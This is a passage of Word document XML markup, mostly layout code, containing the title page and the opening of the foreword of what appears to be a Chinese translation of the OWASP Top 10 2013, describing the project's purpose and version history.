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AD2ACD2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7549E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8" o:spid="_x0000_s3009" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-252078592;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId8" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3061E4A2">
          <v:shapetype id="polygon1" o:spid="_x0000_m3008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68CDF69">
          <v:shape id="WS_polygon1" o:spid="_x0000_s3007" type="#polygon1" style="position:absolute;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-252079616;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="white" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3CC4FD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059">
      <w:pPr>
        <w:sectPr w:rsidR="00F13059">
          <w:pgSz w:w="10800" w:h="14401"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="425"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295DE971" w14:textId="2C30AE67" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="2"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="0C0C5D69">
          <v:shapetype id="_x0000_m3004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0C5D69">
          <v:shape id="_x0000_s3003" type="#_x0000_m3004" style="position:absolute;margin-left:-36pt;margin-top:-7.8pt;width:540pt;height:10in;z-index:-252077568;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="white" stroked="f">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="639CB75D" w14:textId="0E336512" w:rsidR="00C534F5" w:rsidRDefault="00C534F5">
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t>、</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D14B20" w14:textId="63D8D76D" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2304"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="695"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5563A0B3">
          <v:shape id="imagerId9" o:spid="_x0000_s3006" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:111pt;height:96pt;z-index:-252068352;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId9" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6A18DFE5">
          <v:shape id="imagerId10" o:spid="_x0000_s3005" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:11pt;margin-top:670pt;width:84pt;height:31pt;z-index:-252067328;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId10" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="51683F70">
          <v:shapetype id="polygon7" o:spid="_x0000_m3002" coordsize="54000,2789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75691AB">
          <v:shape id="_x0000_s3001" type="#polygon7" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:630pt;width:540pt;height:27.85pt;z-index:-252076544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3F1F08C4">
          <v:shapetype id="polygon8" o:spid="_x0000_m3000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4A01129">
          <v:shape id="WS_polygon8" o:spid="_x0000_s2999" type="#polygon8" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:657.35pt;width:541pt;height:1pt;z-index:25117747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BBF1016">
          <v:shapetype id="polygon9" o:spid="_x0000_m2998" coordsize="200,92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BD8ECB0">
          <v:shape id="WS_polygon9" o:spid="_x0000_s2997" type="#polygon9" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:629pt;width:2pt;height:91.95pt;z-index:25117849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BFD0DD4">
          <v:shapetype id="polygon10" o:spid="_x0000_m2996" coordsize="200,92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6085B74">
          <v:shape id="WS_polygon10" o:spid="_x0000_s2995" type="#polygon10" style="position:absolute;left:0;text-align:left;margin-left:539.5pt;margin-top:629pt;width:2pt;height:91.95pt;z-index:25117952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9A93806">
          <v:shapetype id="polygon11" o:spid="_x0000_m2994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BD71193">
          <v:shape id="WS_polygon11" o:spid="_x0000_s2993" type="#polygon11" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:629.5pt;width:541pt;height:1pt;z-index:25118054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4CA149C">
          <v:shapetype id="polygon24" o:spid="_x0000_m2992" coordsize="26400,299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7858734">
          <v:shape id="_x0000_s2991" type="#polygon24" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:90.15pt;width:264pt;height:29.95pt;z-index:-252075520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18A0AA43">
          <v:shapetype id="polygon25" o:spid="_x0000_m2990" coordsize="265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6B0940B">
          <v:shape id="WS_polygon25" o:spid="_x0000_s2989" type="#polygon25" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:119.6pt;width:265.5pt;height:1pt;z-index:25118873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F2C63AF">
          <v:shapetype id="polygon26" o:spid="_x0000_m2988" coordsize="200,53584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4F8E374">
          <v:shape id="WS_polygon26" o:spid="_x0000_s2987" type="#polygon26" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89.15pt;width:2pt;height:535.8pt;z-index:25118976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5B3A996E">
          <v:shapetype id="polygon27" o:spid="_x0000_m2986" coordsize="200,53584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1CE4F4">
          <v:shape id="WS_polygon27" o:spid="_x0000_s2985" type="#polygon27" style="position:absolute;left:0;text-align:left;margin-left:263.5pt;margin-top:89.15pt;width:2pt;height:535.8pt;z-index:25119078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5988563B">
          <v:shapetype id="polygon28" o:spid="_x0000_m2984" coordsize="265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E60FD5C">
          <v:shape id="WS_polygon28" o:spid="_x0000_s2983" type="#polygon28" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:89.65pt;width:265.5pt;height:1pt;z-index:25119180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9E489CA">
          <v:shapetype id="polygon29" o:spid="_x0000_m2982" coordsize="265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F86DC47">
          <v:shape id="WS_polygon29" o:spid="_x0000_s2981" type="#polygon29" style="position:absolute;left:0;text-align:left;margin-left:-.5pt;margin-top:623.5pt;width:265.5pt;height:1pt;z-index:25119283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53BD7E16">
          <v:shapetype id="polygon92" o:spid="_x0000_m2980" coordsize="126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79AFA38">
          <v:shape id="WS_polygon92" o:spid="_x0000_s2979" type="#polygon92" style="position:absolute;left:0;text-align:left;margin-left:7.2pt;margin-top:590.15pt;width:126pt;height:.6pt;z-index:-2520744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F7E0337">
          <v:shapetype id="polygon97" o:spid="_x0000_m2978" coordsize="1041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04E631F">
          <v:shape id="WS_polygon97" o:spid="_x0000_s2977" type="#polygon97" style="position:absolute;left:0;text-align:left;margin-left:7.2pt;margin-top:602.15pt;width:104.15pt;height:.6pt;z-index:-2520734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A3D65C3">
          <v:shapetype id="polygon98" o:spid="_x0000_m2976" coordsize="27000,3009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075F150">
          <v:shape id="WS_polygon98" o:spid="_x0000_s2975" type="#polygon98" style="position:absolute;left:0;text-align:left;margin-left:270pt;margin-top:89.95pt;width:270pt;height:30.05pt;z-index:-252072448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67B74D1F">
          <v:shapetype id="polygon99" o:spid="_x0000_m2974" coordsize="271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168DE7">
          <v:shape id="WS_polygon99" o:spid="_x0000_s2973" type="#polygon99" style="position:absolute;left:0;text-align:left;margin-left:269pt;margin-top:119.55pt;width:271.5pt;height:1pt;z-index:25120204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24EC97C">
          <v:shapetype id="polygon100" o:spid="_x0000_m2972" coordsize="200,53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394698B">
          <v:shape id="WS_polygon100" o:spid="_x0000_s2971" type="#polygon100" style="position:absolute;left:0;text-align:left;margin-left:269.5pt;margin-top:89pt;width:2pt;height:536pt;z-index:25120307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FA1EEFC">
          <v:shapetype id="polygon101" o:spid="_x0000_m2970" coordsize="271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25A0C32">
          <v:shape id="WS_polygon101" o:spid="_x0000_s2969" type="#polygon101" style="position:absolute;left:0;text-align:left;margin-left:269pt;margin-top:89.5pt;width:271.5pt;height:1pt;z-index:25120409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3929B0E">
          <v:shapetype id="polygon102" o:spid="_x0000_m2968" coordsize="271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A53271A">
          <v:shape id="WS_polygon102" o:spid="_x0000_s2967" type="#polygon102" style="position:absolute;left:0;text-align:left;margin-left:269pt;margin-top:623.5pt;width:271.5pt;height:1pt;z-index:25120512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730FE111">
          <v:shapetype id="polygon132" o:spid="_x0000_m2966" coordsize="1034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33A3419">
          <v:shape id="_x0000_s2965" type="#polygon132" style="position:absolute;left:0;text-align:left;margin-left:295.05pt;margin-top:254.1pt;width:103.4pt;height:.6pt;z-index:-2520714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AED84B7">
          <v:shapetype id="polygon139" o:spid="_x0000_m2964" coordsize="1356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5092DF4">
          <v:shape id="WS_polygon139" o:spid="_x0000_s2963" type="#polygon139" style="position:absolute;left:0;text-align:left;margin-left:295.05pt;margin-top:278.1pt;width:135.6pt;height:.6pt;z-index:-2520704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C34E2CC">
          <v:shapetype id="polygon149" o:spid="_x0000_m2962" coordsize="974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EDA160">
          <v:shape id="_x0000_s2961" type="#polygon149" style="position:absolute;left:0;text-align:left;margin-left:339.2pt;margin-top:314.1pt;width:97.4pt;height:.6pt;z-index:-252069376;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#3a6331" stroked="f"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O</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="98"/>
          <w:position w:val="8"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="7F7F7F"/>
          <w:w w:val="98"/>
          <w:position w:val="8"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>WASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023BD183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4BE13B9F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="695"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB922F9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="695"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7F7DA1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="695"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750354CA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="361" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>前言</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD8B847" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A5A7FC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13059">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>不安全的软件正在破坏我们的金融、医疗、国防、能源、和其</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4FF3D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13059">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>他关键基础设施。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>随着我们的数字基础设施复杂度和关联度越</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B65ED" w14:textId="77777777" w:rsidR="00FB0AEC" w:rsidRDefault="00F13059" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>来越高，实现应用程序安全性的难度呈指数增长。</w:t>
      </w:r>
      <w:r w:rsidR="009068E8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>我们不</w:t>
      </w:r>
      <w:r w:rsidR="00FB0AEC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>能再</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786018DA" w14:textId="49CD308E" w:rsidR="00FB0AEC" w:rsidRDefault="009068E8" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>容忍</w:t>
      </w:r>
      <w:r w:rsidR="00FB0AEC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>那些与</w:t>
      </w:r>
      <w:r w:rsidR="008F0554">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP Top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10</w:t>
      </w:r>
      <w:r w:rsidR="00FB0AEC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>上类似的、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>相对简单的安全问题</w:t>
      </w:r>
      <w:r w:rsidR="00FB0AEC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63465119" w14:textId="38F848D3" w:rsidR="00F13059" w:rsidRDefault="00FB0AEC" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>现了</w:t>
      </w:r>
      <w:r w:rsidR="009068E8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5752254A" w14:textId="77777777" w:rsidR="008F0554" w:rsidRDefault="008F0554" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r w:rsidR="00FB0AEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目的是通过识别最常见的一些核心危险，来提高各个组织的应用安全意识。</w:t>
      </w:r>
      <w:r w:rsidR="001A3E66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个项目被包括</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F412D" w14:textId="77777777" w:rsidR="00437F94" w:rsidRDefault="001A3E66" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r w:rsidRPr="001A3E66">
        <w:t>MITRE, PCI DSS, DISA, FTC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在内的许多标准、书籍、工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A8CDE1" w14:textId="77777777" w:rsidR="00437F94" w:rsidRDefault="001A3E66" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和组织引</w:t>
      </w:r>
      <w:r w:rsidR="00DA40CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用。这个版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十周年之际，是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4890B897" w14:textId="77777777" w:rsidR="00437F94" w:rsidRDefault="001A3E66" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个项目致力于提高应用安全风险意识的标志。</w:t>
      </w:r>
      <w:r w:rsidR="00437F94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA37781" w14:textId="77777777" w:rsidR="00437F94" w:rsidRDefault="00437F94" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首次发布基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2004</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年做了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A5EBA9" w14:textId="38615DB0" w:rsidR="00437F94" w:rsidRDefault="00437F94" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些小的修正。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年版本修改了排序方法，根据风险</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDC03A3" w14:textId="77777777" w:rsidR="00437F94" w:rsidRDefault="00437F94" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>级别排序（之前是根据流行度排序的）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2013</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年的这个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC41A92" w14:textId="7B3C7419" w:rsidR="001A3E66" w:rsidRDefault="00437F94" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本同样遵循（根据风险级别排序）这个排序方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BEAE86" w14:textId="77777777" w:rsidR="00F24840" w:rsidRDefault="00474B07" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们鼓励你用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来让你</w:t>
      </w:r>
      <w:r w:rsidR="00F24840">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的组织开始</w:t>
      </w:r>
      <w:r w:rsidR="00AC0468">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了解应用安</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9AF79C" w14:textId="77777777" w:rsidR="00684C6D" w:rsidRDefault="00AC0468" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全</w:t>
      </w:r>
      <w:r w:rsidR="00F24840">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="006F0715">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发人员</w:t>
      </w:r>
      <w:r w:rsidR="00F24840">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以从其他组织的</w:t>
      </w:r>
      <w:r w:rsidR="00684C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r w:rsidR="00F24840">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误中学习，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527E3431" w14:textId="021C9C76" w:rsidR="00684C6D" w:rsidRDefault="00AC0468" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
